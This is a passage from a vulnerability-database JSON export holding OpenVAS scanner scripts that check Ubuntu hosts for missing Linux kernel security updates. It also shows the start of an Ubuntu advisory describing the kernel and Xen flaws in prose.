exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-1222-omap4\", ver:\"3.0.0-1222.36\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-25T00:00:00", "id": "OPENVAS:1361412562310841374", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841374", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1778-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1778_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1778-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1778-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841374\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-25 11:04:04 +0530 (Mon, 25 Mar 2013)\");\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0349\",\n \"CVE-2013-1773\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1778-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1778-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.10\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 11.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered on the Linux kernel's VFAT filesystem driver when a\n disk is mounted with the utf8 option (this is the default on Ubuntu). On a\n system where disks/images can be auto-mounted or a FAT filesystem is\n mounted an unprivileged user can exploit the flaw to gain root privileges.\n (CVE-2013-1773)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.0.0-1222-omap4\", ver:\"3.0.0-1222.36\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-02-05T11:10:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0216"], "description": "Check for the Version of linux", "modified": "2018-02-03T00:00:00", "published": "2013-03-19T00:00:00", "id": "OPENVAS:841363", "href": "http://plugins.openvas.org/nasl.php?oid=841363", "type": "openvas", "title": "Ubuntu Update for linux USN-1767-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1767_1.nasl 8650 2018-02-03 12:16:59Z teissa $\n#\n# Ubuntu Update for linux USN-1767-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\n kernel. An unprivileged user in a 32bit PVOPS guest can cause the guest\n kernel to crash, or operate erroneously. (CVE-2013-0190)\n\n A failure to validate input was discovered in the Linux kernel's Xen\n netback (network backend) driver. A user in a guest OS may exploit this\n flaw to cause a denial of service to the guest OS and other guest domains.\n (CVE-2013-0216)\n \n A memory leak was discovered in the Linux kernel's Xen netback (network\n backend) driver. A user in a guest OS could trigger this flaw to cause a\n denial of service on the system. (CVE-2013-0217)\n \n Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n \n A flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI\n device is assigned to the guest OS, the guest OS could exploit this flaw to\n cause a denial of service on the host. (CVE-2013-0231)\n \n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n \n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n \n A flaw was discovered in the Extended Verification Module (EVM) of the\n Linux kernel. An unprivileged local user code exploit this flaw to cause a\n denial of service (system crash). (CVE-2013-0313)\n \n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n \n A flaw was discovered in the Edgeort USB serial converter driver when the\n device is disconnected while it is in use. A local user could exploit this\n flaw to cause a denial of service (system crash). (CVE-2013-1774)\";\n\n\ntag_affected = \"linux on Ubuntu 12.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1767-1/\");\n script_id(841363);\n script_version(\"$Revision: 8650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:59 +0100 (Sat, 03 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-19 09:47:54 +0530 (Tue, 19 Mar 2013)\");\n script_cve_id(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\",\n \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0313\",\n \"CVE-2013-0349\", \"CVE-2013-1774\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1767-1\");\n script_name(\"Ubuntu Update for linux USN-1767-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-generic\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-generic-pae\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-highbank\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-omap\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-powerpc-smp\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-powerpc64-smp\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-virtual\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0216"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-19T00:00:00", "id": "OPENVAS:1361412562310841363", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841363", "type": "openvas", "title": "Ubuntu Update for linux USN-1767-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1767_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1767-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1767-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841363\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-19 09:47:54 +0530 (Tue, 19 Mar 2013)\");\n script_cve_id(\"CVE-2013-0190\", \"CVE-2013-0216\", \"CVE-2013-0217\", \"CVE-2013-0228\",\n \"CVE-2013-0231\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0313\",\n \"CVE-2013-0349\", \"CVE-2013-1774\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1767-1\");\n script_name(\"Ubuntu Update for linux USN-1767-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Andrew Cooper of Citrix reported a Xen stack corruption in the Linux\n kernel. An unprivileged user in a 32bit PVOPS guest can cause the guest\n kernel to crash, or operate erroneously. (CVE-2013-0190)\n\n A failure to validate input was discovered in the Linux kernel's Xen\n netback (network backend) driver. A user in a guest OS may exploit this\n flaw to cause a denial of service to the guest OS and other guest domains.\n (CVE-2013-0216)\n\n A memory leak was discovered in the Linux kernel's Xen netback (network\n backend) driver. A user in a guest OS could trigger this flaw to cause a\n denial of service on the system. (CVE-2013-0217)\n\n Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI\n device is assigned to the guest OS, the guest OS could exploit this flaw to\n cause a denial of service on the host. (CVE-2013-0231)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n A flaw was discovered in the Extended Verification Module (EVM) of the\n Linux kernel. An unprivileged local user code exploit this flaw to cause a\n denial of service (system crash). (CVE-2013-0313)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered in the Edgeort USB serial converter driver when the\n device is disconnected while it is in use. A local user could exploit this\n flaw to cause a denial of service (system crash). (CVE-2013-1774)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-generic\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-generic-pae\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-highbank\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-omap\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-powerpc-smp\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-powerpc64-smp\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-39-virtual\", ver:\"3.2.0-39.62\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0313"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:1361412562310841376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841376", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1781-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1781_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1781-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1781-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841376\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:50:13 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\", \"CVE-2013-1774\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1781-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1781-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n\n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n\n A flaw was discovered in the Extended Verification Module (EVM) of the\n Linux kernel. An unprivileged local user code exploit this flaw to cause a\n denial of service (system crash). (CVE-2013-0313)\n\n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n\n A flaw was discovered in the Edgeort USB serial converter driver when the\n device is disconnected while it is in use. A local user could exploit this\n flaw to cause a denial of service (system crash). (CVE-2013-1774)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1427-omap4\", ver:\"3.2.0-1427.36\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-02-05T11:11:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0313"], "description": "Check for the Version of linux-ti-omap4", "modified": "2018-02-03T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:841376", "href": "http://plugins.openvas.org/nasl.php?oid=841376", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1781-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1781_1.nasl 8650 2018-02-03 12:16:59Z teissa $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1781-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's\n Xen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged\n guest OS user could exploit this flaw to cause a denial of service (crash\n the system) or gain guest OS privilege. (CVE-2013-0228)\n\n A flaw was reported in the permission checks done by the Linux kernel for\n /dev/cpu/*/msr. A local root user with all capabilities dropped could\n exploit this flaw to execute code with full root capabilities.\n (CVE-2013-0268)\n \n A flaw was discovered in the Linux kernel's vhost driver used to accelerate\n guest networking in KVM based virtual machines. A privileged guest user\n could exploit this flaw to crash the host system. (CVE-2013-0311)\n \n A flaw was discovered in the Extended Verification Module (EVM) of the\n Linux kernel. An unprivileged local user code exploit this flaw to cause a\n denial of service (system crash). (CVE-2013-0313)\n \n An information leak was discovered in the Linux kernel's Bluetooth stack\n when HIDP (Human Interface Device Protocol) support is enabled. A local\n unprivileged user could exploit this flaw to cause an information leak from\n the kernel. (CVE-2013-0349)\n \n A flaw was discovered in the Edgeort USB serial converter driver when the\n device is disconnected while it is in use. A local user could exploit this\n flaw to cause a denial of service (system crash). (CVE-2013-1774)\";\n\n\ntag_affected = \"linux-ti-omap4 on Ubuntu 12.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1781-1/\");\n script_id(841376);\n script_version(\"$Revision: 8650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:59 +0100 (Sat, 03 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:50:13 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2013-0228\", \"CVE-2013-0268\", \"CVE-2013-0311\", \"CVE-2013-0313\", \"CVE-2013-0349\", \"CVE-2013-1774\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:H/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1781-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1781-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of linux-ti-omap4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1427-omap4\", ver:\"3.2.0-1427.36\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:ADJACENT_NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:33:44", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773", "CVE-2013-0216"], "description": "A failure to validate input was discovered in the Linux kernel's Xen \nnetback (network backend) driver. A user in a guest OS may exploit this \nflaw to cause a denial of service to the guest OS and other guest domains. \n(CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback (network \nbackend) driver. A user in a guest OS could trigger this flaw to cause a \ndenial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux kernel's \nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged \nguest OS user could exploit this flaw to cause a denial of service (crash \nthe system) or gain guest OS privilege. (CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to 